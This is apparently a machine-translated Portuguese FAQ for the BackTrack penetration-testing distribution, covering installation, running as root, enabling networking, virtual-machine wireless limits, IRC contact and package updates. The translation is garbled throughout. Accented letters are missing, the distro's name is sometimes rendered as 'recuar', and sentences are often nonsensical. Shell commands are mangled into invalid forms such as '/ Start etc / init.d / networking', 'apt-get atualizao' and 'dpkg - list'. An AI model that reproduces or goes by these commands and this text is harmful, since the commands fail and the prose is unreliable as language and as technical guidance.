outras verses.

Acabei de queimado meus iso e no vai arrancar?


Os 3 problemas mais comuns so o md5sum errado, o programa que voc usou
para gravar o arquivo. Iso ou mdia de baixo. Por favor, verifique essas trs coisas
antes de pedir ajuda.

Eu uso o Windows e eu no quero estragar tudo?


Backtrack pode ser executado como um ambiente de dvd ao vivo que no ir
afectar o seu Windows instalar de forma alguma. Se voc executar o instalador e
instalar no disco rgido voc responsvel por particionar seu disco corretamente
e selecionar a unidade correta ou partio. Guias sobre mtodos de instalao
podem ser encontradas na pgina de instalao .
Lembre-se que as selees incorretas podem limpar completamente o disco rgido
e, potencialmente, deix-lo sem o seu Windows originais / instalaes de Linux!
Considere isso como seu nico aviso!

Eu ouvi o seu estpido para ser executado como root?


Muitas das ferramentas no Backtrack precisar ter acesso root para ser
executado. Backtrack uma distribuio de testes especializados penetrao. Ns
confio nossos usurios sabem os riscos de segurana da execuo como usurio
root.

Qual o laptop "perfeito" para executar recuar em?

Verso de cada um, de perfeito diferente. No h computador perfeito. Por favor,


verifique os fruns onde usurios postam seus pensamentos sobre os modelos de
computadores.
Por favor, lembre-se de adicionar sua lista tambm

Onde est o manual Backtrack?


No h manual. Ns escrever documentao oficial sobre como instalar o
Backtrack e como usar algumas das ferramentas mais exticos, no entanto, no
escrever guias sobre hacking em geral. Temos um frum da comunidade e um
wiki, que contm muitos usurios e tutoriais apresentados Dev-Team. No se
esquea tambm de verificar o manual de seo do site para mais informaes
sobre a documentao oficial.

Vocs oferecem algum tipo de treinamento oficial?


Consulte a nossa formao ofensiva Segurana website para a Formao
BackTrack s oficial.

Onde posso encontrar mais informaes sobre


BackTrack?
Mantenha-se atualizado com o nosso blogue , verificar os nossos fruns e
verificar se h inversas Correes aqui.

Por que eu no posso apenas adicionar os


repositrios recuar para minha instalao do Ubuntu
ou os repositrios do Ubuntu para minha instalao
Backtrack?
Recomendamos contra essa ao porque as ferramentas Backtrack so
construdos com muitos recursos personalizados, bibliotecas e do kernel.Ns no
temos nenhuma maneira de saber como eles iro realizar uma distribuio
Backtrack no, mais voc vai quebrar muito rapidamente a sua instalao.

Alm disso, se voc optou por adicionar os repositrios do Ubuntu para o seu
Backtrack instalao, voc provavelmente vai quebrar todo o seu Backtrack
instalao muito rapidamente.
Ns fazemos um monte de testes para garantir que todos os pacotes em nosso
repo iro trabalhar em conjunto sem causar problemas.
Se voc decidir sobre este curso de ao que voc o faz inteiramente por sua
conta e risco e da equipe de voltar atrs no oferecer qualquer apoio de qualquer
forma.

Eu quiser / precisar de reconstruir o kernel, voc pode


me ajudar?
Em primeiro lugar, muito improvvel que voc realmente tem uma necessidade
de fazer isso. Em segundo lugar, se voc precisar de ajuda na reconstruo do
kernel, ento voc provavelmente no deveria estar fazendo isso em primeiro
lugar.
Ns fazemos um monte de testes para garantir que todos os pacotes em nosso
trabalho repo com o kernel ns fornecemos e usando seu prprio kernel no temos
nenhuma maneira de saber o que vai quebrar a compatibilidade. No apoiamos
isso e no oferecem ajuda a quem optar por ir em frente e reconstruir o kernel.
Desculpe, mas se voc ainda sente que voc quiser / precisar recompilar o kernel,
por qualquer razo, voc est no seu prprio pas. No apoiamos isso e vai
oferecer nenhuma pergunta ou resposta de ajuda de quem optar por ir em frente e
reconstruir o kernel.

Por que no os meus cartes de rede aparecem


quando eu inicio o sistema?
BackTrack uma distribuio de testes de penetrao e, como tais pedidos DHCP,
etc, que entra na rede quando voc inicializar normalmente so muito
indesejveis. Voc pode facilmente ativar a rede, emitindo o seguinte comando:
/ Start etc / init.d / networking

Por que no posso uso BackTrack placa wireless "X"


dentro VMWare ou Virtualbox?
Qualquer software de virtualizao s pode usar placas de rede sem fio USB como
dispositivos fsicos, todos os outros tipos de carto sem fio so vistos como
dispositivos virtuais de ethernet e s pode ser visto como um dispositivo sem fio

pelo anfitrio e no pelo sistema operacional convidado. Ento, se voc deseja


executar BackTrack em VMWare ou Virtualbox e tem plenas capacidades sem fio,
certifique-se que voc est usando um dispositivo USB.

Por que voc no fornecer uma imagem USB como


voc fez com as verses anteriores?
As verses anteriores exigidos s vezes bastante complicado mtodos para
instalar em um stick USB, ento por convenincia, desde imagens especiais para
fcil instalao. Com as ltimas edies do BackTrack ns eliminamos essa
necessidade, pois ele pode ser facilmente instalado em um stick USB com
ferramentas como Unetbootin ou atravs de mtodos manuais, conforme descrito
na Instalao seo deste site.

Como fao para contat-lo?


Para ser honesto, na maioria dos casos, voc realmente no precisa.
Em primeiro lugar considero isso, cada um de ns recebe centenas de e-mails e
mensagens privadas, tanto nos fruns e em nosso canal de IRC todos os
dias. Quase todas essas mensagens so de pessoas fazendo perguntas simples
que so ou abrangidos por este wiki, FAQ ou nofrum em si. Quase todas das
pessoas uma questo que deve ser perguntado sobre o frum como so
cobertos l, ou a pergunta e resposta subseqente seria um benefcio para toda
a comunidade ao invs de apenas uma pessoa a perguntar. Pense desta forma, se
voc est fazendo esta pergunta, no faria sentido que algum pode ter a mesma
questo ou j podem ter perguntado isso. O frum e wiki so fontes valiosas de
informao, e que a informao apenas to boa como as perguntas e as
respostas dadas.
Em segundo lugar, toda a equipe so voluntrios, nenhum de ns so pagos para
trabalhar no projeto e todos ns temos vida, famlia, trabalho etc etc fora do
BackTrack. Ns todos dar o nosso tempo livre para o projeto e mais do que
absorvido responder a estas perguntas menos tempo temos que trabalhar em
fazer BackTrack ainda melhor do que .
Assim, em breve, se a sua dvida se enquadra na descrio acima, ento de seu
interesse no enviar e-mail ou enviar uma mensagem privada. mais provvel
que apenas so ignorados se no se enquadram nesta categoria.

No entanto, se h uma coisa no abrangidos pelo disposto acima, em seguida, por


todos os meios que entre em contato conosco.
Voc pode encontrar toda a equipe de desenvolvimento em nosso canal de IRC
(lembre-se que no vivemos l o tempo todo), nos fruns ou entre em contato
com detalhes sobre a Sobre a pgina do site .

Onde est o canal de IRC que voc est falando?


Se voc gostaria de fazer parte da comunidade e contribuir, visite-nos
em irc.freenode.net , no canal # backtrack-linux . Nosso site vai continuar a ser
a principal fonte para todas as notcias e atualizaes sobre BackTrack. Certifiquese de ver as nossas regras do canal ler o tpico do canal e lembrar que voc
precisa ser registrado para falar.
Importante: root (* raiz * @ *) proibido por padro neste canal, por isso, garantir
que voc configure seu cliente de irc de forma adequada.

Eu sou novo no linux, BackTrack um bom lugar para


comear?
Desculpe, a resposta simples para isso no.
BackTrack uma distribuio altamente especializado, onde um monte de tarefas
normais no so feitas automaticamente para voc como eles esto em uma distro
mainstream.
Nosso melhor conselho que se voc deseja comear usando linux com BackTrack
como seu primeiro sistema operacional linux, no.
Comece fazendo o download de uma cpia do Kubuntu (como um sistema
operacional semelhante base para BackTrack) de inicializao em que e se forar
a fazer tudo o que voc est acostumado a fazer em uma base diria com que, de
preferncia gastando a maior parte do seu tempo usando o comando ferramentas
de linha. Quando e somente quando possvel realizar todas essas tarefas dirias
sem ter que olhar-se os comandos que voc deve mudar para BackTrack.
Por favor, no tome isso como ns dizendo que voc no deve usar BackTrack,
tom-lo como conselho de amigo que voc est deixando-se em um mundo de dor
e frustrao, se voc no est totalmente confortvel administrao realizao de
sua prpria mquina linux antes de comear com Backtrack.

Acabo de baixado e instalado a ltima verso do


Backtrack, que eu ainda preciso atualizar?
Apesar de ter baixado a verso mais recente do iso ou VM, isso no significa que
voc ter os mais recentes pacotes que disponibilizamos.BackTrack
desenvolvido e atualizado em uma base contnua, e por isso voc ainda deve
atualizar sua instalao em intervalos regulares para manter-se atualizado com os
ltimos pacotes, correes de bugs e novas ferramentas.

Quando e com que freqncia voc atualizar o repo


BackTrack com novos pacotes?
Geralmente o repo BackTrack atualizado com as semanas novos pacotes na
noite de domingo noite para que eles esto disponveis para voc na manh de
segunda-feira.
H tempos no entanto quando sentimos que um pacote precisa ser liberado de
imediato ao invs de esperar at a prxima agendada domingo repo de
atualizao. Ento, nestes casos, a atualizao repo pode acontecer a qualquer
hora do dia ou da noite durante a semana.
Por favor, note que, enquanto o repo est sendo sincronizado, ele no estar
disponvel para download de pacotes. Este processo no leva muito tempo por
isso vai ser raro que isso para fazer com que qualquer um de vocs mais do que
um perodo muito curto de indisponibilidade.

Como fao para atualizar o Backtrack com os novos


pacotes?
Primeiro, verifique se voc tem uma conexo de internet, ento use os seguintes
comandos
root @ bt: ~ # apt-get update
root @ bt: ~ # apt-get atualizao

Opcionalmente, voc pode executar


root @ bt: ~ # apt-get update

root @ bt: ~ # apt-get dist-upgrade

Onde posso encontrar uma lista completa de todas as


ferramentas instaladas no BackTrack?
Nenhum recurso existe atualmente, porm voc pode ver uma lista de todos os
pacotes instalados em seu sistema BackTrack executando:
dpkg - list

Lembre-se que isto ir listar todos os pacotes instalados no BackTrack e no


apenas as ferramentas
Voc tambm pode pesquisar o repositrio de um pacote de interesse particular,
executando o seguinte comando:
apt-cache search <keyword de interest>